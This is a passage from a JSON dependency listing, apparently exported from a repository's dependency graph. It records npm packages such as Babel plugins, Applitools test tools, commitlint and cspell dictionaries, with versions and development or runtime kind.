"development","optional":false},{"id":14013847507,"package_name":"@applitools","ecosystem":"npm","requirements":"dom-shared@1.0.10","direct":false,"kind":"development","optional":false},{"id":14013847508,"package_name":"@applitools","ecosystem":"npm","requirements":"dom-shared@1.0.5","direct":false,"kind":"development","optional":false},{"id":14013847509,"package_name":"@applitools","ecosystem":"npm","requirements":"dom-snapshot@4.7.9","direct":false,"kind":"development","optional":false},{"id":14013847510,"package_name":"@applitools","ecosystem":"npm","requirements":"driver@1.12.1","direct":false,"kind":"development","optional":false},{"id":14013847511,"package_name":"@applitools","ecosystem":"npm","requirements":"ec-client@1.2.32(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013847512,"package_name":"@applitools","ecosystem":"npm","requirements":"eg-frpc@1.0.3","direct":false,"kind":"development","optional":false},{"id":14013847513,"package_name":"@applitools","ecosystem":"npm","requirements":"eg-socks5-proxy-server@0.5.4","direct":false,"kind":"development","optional":false},{"id":14013847514,"package_name":"@applitools","ecosystem":"npm","requirements":"execution-grid-tunnel@2.1.0","direct":false,"kind":"development","optional":false},{"id":14013847515,"package_name":"@applitools","ecosystem":"npm","requirements":"eyes-cypress@3.33.1(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013847516,"package_name":"@applitools","ecosystem":"npm","requirements":"eyes@1.2.14(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013847517,"package_name":"@applitools","ecosystem":"npm","requirements":"functional-commons@1.6.0","direct":false,"kind":"development","optional":false},{"id":14013847518,"package_name":"@applitools","ecosystem":"npm","requirements":"image@1.0.34","direct":false,"kind":"development","optional":false},{"id":14013847519,"package_name":"@applitools","ecosystem":"npm","requirements":"jsdom@1.0.4","direct":false,"kind":"development","optional":false},{"id":14013847520,"package_name":"@applitools","ecosystem":"npm","requirements":"logger@1.1.48","direct":false,"kind":"development","optional":false},{"id":14013847521,"package_name":"@applitools","ecosystem":"npm","requirements":"logger@2.0.2","direct":false,"kind":"development","optional":false},{"id":14013847522,"package_name":"@applitools","ecosystem":"npm","requirements":"nml-client@1.3.55","direct":false,"kind":"development","optional":false},{"id":14013847523,"package_name":"@applitools","ecosystem":"npm","requirements":"req@1.3.0","direct":false,"kind":"development","optional":false},{"id":14013847524,"package_name":"@applitools","ecosystem":"npm","requirements":"screenshoter@3.7.46","direct":false,"kind":"development","optional":false},{"id":14013847525,"package_name":"@applitools","ecosystem":"npm","requirements":"snippets@2.4.21","direct":false,"kind":"development","optional":false},{"id":14013847526,"package_name":"@applitools","ecosystem":"npm","requirements":"socket@1.1.1","direct":false,"kind":"development","optional":false},{"id":14013847527,"package_name":"@applitools","ecosystem":"npm","requirements":"spec-driver-webdriver@1.0.33(webdriver@7.30.0)","direct":false,"kind":"development","optional":false},{"id":14013847528,"package_name":"@applitools","ecosystem":"npm","requirements":"ufg-client@1.2.18","direct":false,"kind":"development","optional":false},{"id":14013847529,"package_name":"@applitools","ecosystem":"npm","requirements":"utils@1.3.32","direct":false,"kind":"development","optional":false},{"id":14013847530,"package_name":"@applitools","ecosystem":"npm","requirements":"utils@1.3.37","direct":false,"kind":"development","optional":false},{"id":14013847531,"package_name":"@arr","ecosystem":"npm","requirements":"every@1.0.1","direct":false,"kind":"development","optional":false},{"id":14013847532,"package_name":"@babel","ecosystem":"npm","requirements":"code-frame@7.18.6","direct":false,"kind":"development","optional":false},{"id":14013847533,"package_name":"@babel","ecosystem":"npm","requirements":"compat-data@7.21.0","direct":false,"kind":"development","optional":false},{"id":14013847534,"package_name":"@babel","ecosystem":"npm","requirements":"core@7.12.3","direct":false,"kind":"development","optional":false},{"id":14013847535,"package_name":"@babel","ecosystem":"npm","requirements":"generator@7.21.1","direct":false,"kind":"development","optional":false},{"id":14013847536,"package_name":"@babel","ecosystem":"npm","requirements":"helper-annotate-as-pure@7.18.6","direct":false,"kind":"development","optional":false},{"id":14013847537,"package_name":"@babel","ecosystem":"npm","requirements":"helper-builder-binary-assignment-operator-visitor@7.18.9","direct":false,"kind":"development","optional":false},{"id":14013847538,"package_name":"@babel","ecosystem":"npm","requirements":"helper-compilation-targets@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847539,"package_name":"@babel","ecosystem":"npm","requirements":"helper-create-class-features-plugin@7.21.0(@babel","direct":false,"kind":"development","optional":false},{"id":14013847540,"package_name":"@babel","ecosystem":"npm","requirements":"helper-create-regexp-features-plugin@7.21.0(@babel","direct":false,"kind":"development","optional":false},{"id":14013847541,"package_name":"@babel","ecosystem":"npm","requirements":"helper-define-polyfill-provider@0.3.3(@babel","direct":false,"kind":"development","optional":false},{"id":14013847542,"package_name":"@babel","ecosystem":"npm","requirements":"helper-environment-visitor@7.18.9","direct":false,"kind":"development","optional":false},{"id":14013847543,"package_name":"@babel","ecosystem":"npm","requirements":"helper-explode-assignable-expression@7.18.6","direct":false,"kind":"development","optional":false},{"id":14013847544,"package_name":"@babel","ecosystem":"npm","requirements":"helper-function-name@7.21.0","direct":false,"kind":"development","optional":false},{"id":14013847545,"package_name":"@babel","ecosystem":"npm","requirements":"helper-hoist-variables@7.18.6","direct":false,"kind":"development","optional":false},{"id":14013847546,"package_name":"@babel","ecosystem":"npm","requirements":"helper-member-expression-to-functions@7.21.0","direct":false,"kind":"development","optional":false},{"id":14013847547,"package_name":"@babel","ecosystem":"npm","requirements":"helper-module-imports@7.18.6","direct":false,"kind":"development","optional":false},{"id":14013847548,"package_name":"@babel","ecosystem":"npm","requirements":"helper-module-transforms@7.21.2","direct":false,"kind":"development","optional":false},{"id":14013847549,"package_name":"@babel","ecosystem":"npm","requirements":"helper-optimise-call-expression@7.18.6","direct":false,"kind":"development","optional":false},{"id":14013847550,"package_name":"@babel","ecosystem":"npm","requirements":"helper-plugin-utils@7.20.2","direct":false,"kind":"development","optional":false},{"id":14013847551,"package_name":"@babel","ecosystem":"npm","requirements":"helper-remap-async-to-generator@7.18.9(@babel","direct":false,"kind":"development","optional":false},{"id":14013847552,"package_name":"@babel","ecosystem":"npm","requirements":"helper-replace-supers@7.20.7","direct":false,"kind":"development","optional":false},{"id":14013847553,"package_name":"@babel","ecosystem":"npm","requirements":"helper-simple-access@7.20.2","direct":false,"kind":"development","optional":false},{"id":14013847554,"package_name":"@babel","ecosystem":"npm","requirements":"helper-skip-transparent-expression-wrappers@7.20.0","direct":false,"kind":"development","optional":false},{"id":14013847555,"package_name":"@babel","ecosystem":"npm","requirements":"helper-split-export-declaration@7.18.6","direct":false,"kind":"development","optional":false},{"id":14013847556,"package_name":"@babel","ecosystem":"npm","requirements":"helper-string-parser@7.19.4","direct":false,"kind":"runtime","optional":false},{"id":14013847557,"package_name":"@babel","ecosystem":"npm","requirements":"helper-validator-identifier@7.19.1","direct":false,"kind":"runtime","optional":false},{"id":14013847558,"package_name":"@babel","ecosystem":"npm","requirements":"helper-validator-option@7.21.0","direct":false,"kind":"development","optional":false},{"id":14013847559,"package_name":"@babel","ecosystem":"npm","requirements":"helper-wrap-function@7.20.5","direct":false,"kind":"development","optional":false},{"id":14013847560,"package_name":"@babel","ecosystem":"npm","requirements":"helpers@7.19.0","direct":false,"kind":"development","optional":false},{"id":14013847561,"package_name":"@babel","ecosystem":"npm","requirements":"highlight@7.18.6","direct":false,"kind":"development","optional":false},{"id":14013847562,"package_name":"@babel","ecosystem":"npm","requirements":"parser@7.21.8","direct":false,"kind":"runtime","optional":false},{"id":14013847563,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-bugfix-safari-id-destructuring-collision-in-function-expression@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847564,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-bugfix-v8-spread-parameters-in-optional-chaining@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847565,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-async-generator-functions@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847566,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-class-properties@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847567,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-class-static-block@7.21.0(@babel","direct":false,"kind":"development","optional":false},{"id":14013847568,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-dynamic-import@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847569,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-export-namespace-from@7.18.9(@babel","direct":false,"kind":"development","optional":false},{"id":14013847570,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-json-strings@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847571,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-logical-assignment-operators@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847572,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-nullish-coalescing-operator@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847573,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-numeric-separator@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847574,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-object-rest-spread@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847575,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-optional-catch-binding@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847576,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-optional-chaining@7.21.0(@babel","direct":false,"kind":"development","optional":false},{"id":14013847577,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-private-methods@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847578,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-private-property-in-object@7.21.0(@babel","direct":false,"kind":"development","optional":false},{"id":14013847579,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-proposal-unicode-property-regex@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847580,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-async-generators@7.8.4(@babel","direct":false,"kind":"development","optional":false},{"id":14013847581,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-bigint@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":14013847582,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-class-properties@7.12.13(@babel","direct":false,"kind":"development","optional":false},{"id":14013847583,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-class-static-block@7.14.5(@babel","direct":false,"kind":"development","optional":false},{"id":14013847584,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-dynamic-import@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":14013847585,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-export-namespace-from@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":14013847586,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-import-assertions@7.20.0(@babel","direct":false,"kind":"development","optional":false},{"id":14013847587,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-import-meta@7.10.4(@babel","direct":false,"kind":"development","optional":false},{"id":14013847588,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-json-strings@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":14013847589,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-jsx@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847590,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-logical-assignment-operators@7.10.4(@babel","direct":false,"kind":"development","optional":false},{"id":14013847591,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-nullish-coalescing-operator@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":14013847592,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-numeric-separator@7.10.4(@babel","direct":false,"kind":"development","optional":false},{"id":14013847593,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-object-rest-spread@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":14013847594,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-optional-catch-binding@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":14013847595,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-optional-chaining@7.8.3(@babel","direct":false,"kind":"development","optional":false},{"id":14013847596,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-private-property-in-object@7.14.5(@babel","direct":false,"kind":"development","optional":false},{"id":14013847597,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-top-level-await@7.14.5(@babel","direct":false,"kind":"development","optional":false},{"id":14013847598,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-syntax-typescript@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847599,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-arrow-functions@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847600,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-async-to-generator@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847601,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-block-scoped-functions@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847602,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-block-scoping@7.21.0(@babel","direct":false,"kind":"development","optional":false},{"id":14013847603,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-classes@7.21.0(@babel","direct":false,"kind":"development","optional":false},{"id":14013847604,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-computed-properties@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847605,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-destructuring@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847606,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-dotall-regex@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847607,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-duplicate-keys@7.18.9(@babel","direct":false,"kind":"development","optional":false},{"id":14013847608,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-exponentiation-operator@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847609,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-for-of@7.21.0(@babel","direct":false,"kind":"development","optional":false},{"id":14013847610,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-function-name@7.18.9(@babel","direct":false,"kind":"development","optional":false},{"id":14013847611,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-literals@7.18.9(@babel","direct":false,"kind":"development","optional":false},{"id":14013847612,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-member-expression-literals@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847613,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-modules-amd@7.20.11(@babel","direct":false,"kind":"development","optional":false},{"id":14013847614,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-modules-commonjs@7.21.2(@babel","direct":false,"kind":"development","optional":false},{"id":14013847615,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-modules-systemjs@7.20.11(@babel","direct":false,"kind":"development","optional":false},{"id":14013847616,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-modules-umd@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847617,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-named-capturing-groups-regex@7.20.5(@babel","direct":false,"kind":"development","optional":false},{"id":14013847618,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-new-target@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847619,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-object-super@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847620,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-parameters@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847621,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-property-literals@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847622,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-regenerator@7.20.5(@babel","direct":false,"kind":"development","optional":false},{"id":14013847623,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-reserved-words@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847624,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-shorthand-properties@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847625,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-spread@7.20.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847626,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-sticky-regex@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847627,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-template-literals@7.18.9(@babel","direct":false,"kind":"development","optional":false},{"id":14013847628,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-typeof-symbol@7.18.9(@babel","direct":false,"kind":"development","optional":false},{"id":14013847629,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-unicode-escapes@7.18.10(@babel","direct":false,"kind":"development","optional":false},{"id":14013847630,"package_name":"@babel","ecosystem":"npm","requirements":"plugin-transform-unicode-regex@7.18.6(@babel","direct":false,"kind":"development","optional":false},{"id":14013847631,"package_name":"@babel","ecosystem":"npm","requirements":"preset-env@7.20.2(@babel","direct":false,"kind":"development","optional":false},{"id":14013847632,"package_name":"@babel","ecosystem":"npm","requirements":"preset-modules@0.1.5(@babel","direct":false,"kind":"development","optional":false},{"id":14013847633,"package_name":"@babel","ecosystem":"npm","requirements":"regjsgen@0.8.0","direct":false,"kind":"development","optional":false},{"id":14013847634,"package_name":"@babel","ecosystem":"npm","requirements":"runtime@7.21.0","direct":false,"kind":"development","optional":false},{"id":14013847635,"package_name":"@babel","ecosystem":"npm","requirements":"template@7.20.7","direct":false,"kind":"development","optional":false},{"id":14013847636,"package_name":"@babel","ecosystem":"npm","requirements":"traverse@7.21.2","direct":false,"kind":"development","optional":false},{"id":14013847637,"package_name":"@babel","ecosystem":"npm","requirements":"types@7.21.2","direct":false,"kind":"runtime","optional":false},{"id":14013847638,"package_name":"@bcherny","ecosystem":"npm","requirements":"json-schema-ref-parser@9.0.9","direct":false,"kind":"development","optional":false},{"id":14013847658,"package_name":"@bcoe","ecosystem":"npm","requirements":"v8-coverage@0.2.3","direct":false,"kind":"development","optional":false},{"id":14013847659,"package_name":"@braintree","ecosystem":"npm","requirements":"sanitize-url@6.0.2","direct":false,"kind":"runtime","optional":false},{"id":14013847660,"package_name":"@colors","ecosystem":"npm","requirements":"colors@1.5.0","direct":false,"kind":"development","optional":false},{"id":14013847661,"package_name":"@commitlint","ecosystem":"npm","requirements":"cli@17.6.1","direct":false,"kind":"development","optional":false},{"id":14013847662,"package_name":"@commitlint","ecosystem":"npm","requirements":"config-conventional@17.6.1","direct":false,"kind":"development","optional":false},{"id":14013847663,"package_name":"@commitlint","ecosystem":"npm","requirements":"config-validator@17.4.4","direct":false,"kind":"development","optional":false},{"id":14013847664,"package_name":"@commitlint","ecosystem":"npm","requirements":"ensure@17.4.4","direct":false,"kind":"development","optional":false},{"id":14013847665,"package_name":"@commitlint","ecosystem":"npm","requirements":"execute-rule@17.4.0","direct":false,"kind":"development","optional":false},{"id":14013847666,"package_name":"@commitlint","ecosystem":"npm","requirements":"format@17.4.4","direct":false,"kind":"development","optional":false},{"id":14013847667,"package_name":"@commitlint","ecosystem":"npm","requirements":"is-ignored@17.4.4","direct":false,"kind":"development","optional":false},{"id":14013847668,"package_name":"@commitlint","ecosystem":"npm","requirements":"lint@17.6.1","direct":false,"kind":"development","optional":false},{"id":14013847669,"package_name":"@commitlint","ecosystem":"npm","requirements":"load@17.5.0","direct":false,"kind":"development","optional":false},{"id":14013847670,"package_name":"@commitlint","ecosystem":"npm","requirements":"message@17.4.2","direct":false,"kind":"development","optional":false},{"id":14013847671,"package_name":"@commitlint","ecosystem":"npm","requirements":"parse@17.4.4","direct":false,"kind":"development","optional":false},{"id":14013847672,"package_name":"@commitlint","ecosystem":"npm","requirements":"read@17.5.1","direct":false,"kind":"development","optional":false},{"id":14013847673,"package_name":"@commitlint","ecosystem":"npm","requirements":"resolve-extends@17.4.4","direct":false,"kind":"development","optional":false},{"id":14013847674,"package_name":"@commitlint","ecosystem":"npm","requirements":"rules@17.6.1","direct":false,"kind":"development","optional":false},{"id":14013847675,"package_name":"@commitlint","ecosystem":"npm","requirements":"to-lines@17.4.0","direct":false,"kind":"development","optional":false},{"id":14013847676,"package_name":"@commitlint","ecosystem":"npm","requirements":"top-level@17.4.0","direct":false,"kind":"development","optional":false},{"id":14013847677,"package_name":"@commitlint","ecosystem":"npm","requirements":"types@17.4.4","direct":false,"kind":"development","optional":false},{"id":14013847678,"package_name":"@cspell","ecosystem":"npm","requirements":"cspell-bundled-dicts@6.31.1","direct":false,"kind":"development","optional":false},{"id":14013847683,"package_name":"@cspell","ecosystem":"npm","requirements":"cspell-pipe@6.31.1","direct":false,"kind":"development","optional":false},{"id":14013847684,"package_name":"@cspell","ecosystem":"npm","requirements":"cspell-service-bus@6.31.1","direct":false,"kind":"development","optional":false},{"id":14013847685,"package_name":"@cspell","ecosystem":"npm","requirements":"cspell-types@6.31.1","direct":false,"kind":"development","optional":false},{"id":14013847686,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-ada@4.0.1","direct":false,"kind":"development","optional":false},{"id":14013847687,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-aws@3.0.0","direct":false,"kind":"development","optional":false},{"id":14013847688,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-bash@4.1.1","direct":false,"kind":"development","optional":false},{"id":14013847689,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-companies@3.0.10","direct":false,"kind":"development","optional":false},{"id":14013847690,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-cpp@5.0.3","direct":false,"kind":"development","optional":false},{"id":14013847691,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-cryptocurrencies@3.0.1","direct":false,"kind":"development","optional":false},{"id":14013847692,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-csharp@4.0.2","direct":false,"kind":"development","optional":false},{"id":14013847693,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-css@4.0.6","direct":false,"kind":"development","optional":false},{"id":14013847694,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-dart@2.0.2","direct":false,"kind":"development","optional":false},{"id":14013847695,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-django@4.0.2","direct":false,"kind":"development","optional":false},{"id":14013847696,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-docker@1.1.6","direct":false,"kind":"development","optional":false},{"id":14013847697,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-dotnet@5.0.0","direct":false,"kind":"development","optional":false},{"id":14013847698,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-elixir@4.0.3","direct":false,"kind":"development","optional":false},{"id":14013847699,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-en-common-misspellings@1.0.2","direct":false,"kind":"development","optional":false},{"id":14013847700,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-en-gb@1.1.33","direct":false,"kind":"development","optional":false},{"id":14013847701,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-en_us@4.3.2","direct":false,"kind":"development","optional":false},{"id":14013847702,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-filetypes@3.0.0","direct":false,"kind":"development","optional":false},{"id":14013847703,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-fonts@3.0.2","direct":false,"kind":"development","optional":false},{"id":14013847704,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-fullstack@3.1.5","direct":false,"kind":"development","optional":false},{"id":14013847705,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-gaming-terms@1.0.4","direct":false,"kind":"development","optional":false},{"id":14013847706,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-git@2.0.0","direct":false,"kind":"development","optional":false},{"id":14013847707,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-golang@6.0.1","direct":false,"kind":"development","optional":false},{"id":14013847708,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-haskell@4.0.1","direct":false,"kind":"development","optional":false},{"id":14013847709,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-html-symbol-entities@4.0.0","direct":false,"kind":"development","optional":false},{"id":14013847710,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-html@4.0.3","direct":false,"kind":"development","optional":false},{"id":14013847711,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-java@5.0.5","direct":false,"kind":"development","optional":false},{"id":14013847712,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-k8s@1.0.1","direct":false,"kind":"development","optional":false},{"id":14013847713,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-latex@4.0.0","direct":false,"kind":"development","optional":false},{"id":14013847714,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-lorem-ipsum@3.0.0","direct":false,"kind":"development","optional":false},{"id":14013847715,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-lua@4.0.1","direct":false,"kind":"development","optional":false},{"id":14013847716,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-node@4.0.2","direct":false,"kind":"development","optional":false},{"id":14013847717,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-npm@5.0.5","direct":false,"kind":"development","optional":false},{"id":14013847718,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-php@4.0.1","direct":false,"kind":"development","optional":false},{"id":14013847719,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-powershell@5.0.1","direct":false,"kind":"development","optional":false},{"id":14013847720,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-public-licenses@2.0.2","direct":false,"kind":"development","optional":false},{"id":14013847721,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-python@4.0.4","direct":false,"kind":"development","optional":false},{"id":14013847722,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-r@2.0.1","direct":false,"kind":"development","optional":false},{"id":14013847723,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-ruby@5.0.0","direct":false,"kind":"development","optional":false},{"id":14013847724,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-rust@4.0.1","direct":false,"kind":"development","optional":false},{"id":14013847725,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-scala@5.0.0","direct":false,"kind":"development","optional":false},{"id":14013847726,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-software-terms@3.1.8","direct":false,"kind":"development","optional":false},{"id":14013847727,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-sql@2.1.0","direct":false,"kind":"development","optional":false},{"id":14013847728,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-svelte@1.0.2","direct":false,"kind":"development","optional":false},{"id":14013847729,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-swift@2.0.1","direct":false,"kind":"development","optional":false},{"id":14013847730,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-typescript@3.1.1","direct":false,"kind":"development","optional":false},{"id":14013847731,"package_name":"@cspell","ecosystem":"npm","requirements":"dict-vue@3.0.0","direct":false,"kind":"development","optional":false},{"id":14013847732,"package_name":"@cspell","ecosystem":"npm","requirements":"dynamic-import@6.31.1","direct":false,"kind":"development","optional":false},{"id":14013847733,"package_name":"@cspell","ecosystem":"npm","requirements":"eslint-plugin@6.31.1","direct":false,"kind":"development","optional":false},{"id":14013847734,"package_name":"@cspell","ecosystem":"npm","requirements":"strong-weak-map@6.31.1","direct":false,"kind":"development","optional":false},{"id":14013847735,"package_name":"@cspotcode","ecosystem":"npm","requirements":"source-map-support@0.8.1","direct":false,"kind":"runtime","optional":false},{"id":14013847736,"package_name":"@cypress","ecosystem":"npm","requirements":"code-coverage@3.10.7(@babel","direct":false,"kind":"development","optional":false},{"id":14013847737,"package_name":"@cypress","ecosystem":"npm","requirements":"request@2.88.10","direct":false,"kind":"development","optional":false},{"id":14013847738,"package_name":"@cypress","ecosystem":"npm","requirements":"webpack-preprocessor@5.17.1(@babel","direct":false,"kind":"development","optional":false},{"id":14013847739,"package_name":"@cypress","ecosystem":"npm","requirements":"xvfb@1.2.4(supports-color@8.1.1)","direct":false,"kind":"development","optional":false},{"id":14013847740,"package_name":"@discoveryjs","ecosystem":"npm","requirements":"json-ext@0.5.7","direct":false,"kind":"development","optional":false},{"id":14013847741,"package_name":"@docsearch","ecosystem":"npm","requirements":"css@3.3.3","direct":false,"kind":"development","optional":false},{"id":14013847742,"package_name":"@docsearch","ecosystem":"npm","requirements":"css@3.3.5","direct":false,"kind":"development","optional":false},{"id":14013847743,"package_name":"@docsearch","ecosystem":"npm","requirements":"css@3.5.2","direct":false,"kind":"development","optional":false},{"id":14013847744,"package_name":"@docsearch","ecosystem":"npm","requirements":"js@3.3.5(@algolia","direct":false,"kind":"development","optional":false},{"id":14013847745,"package_name":"@docsearch","ecosystem":"npm","requirements":"js@3.5.2(@algolia","direct":false,"kind":"development","optional":false},{"id":14013847746,"package_name":"@docsearch","ecosystem":"npm","requirements":"react@3.3.5(@algolia","direct":false,"kind":"development","optional":false},{"id":14013847747,"package_name":"@docsearch","ecosystem":"npm","requirements":"react@3.5.2(@algolia","direct":false,"kind":"development","optional":false},{"id":14013847748,"package_name":"@es-joy","ecosystem":"npm","requirements":"jsdoccomment@0.39.4","direct":false,"ki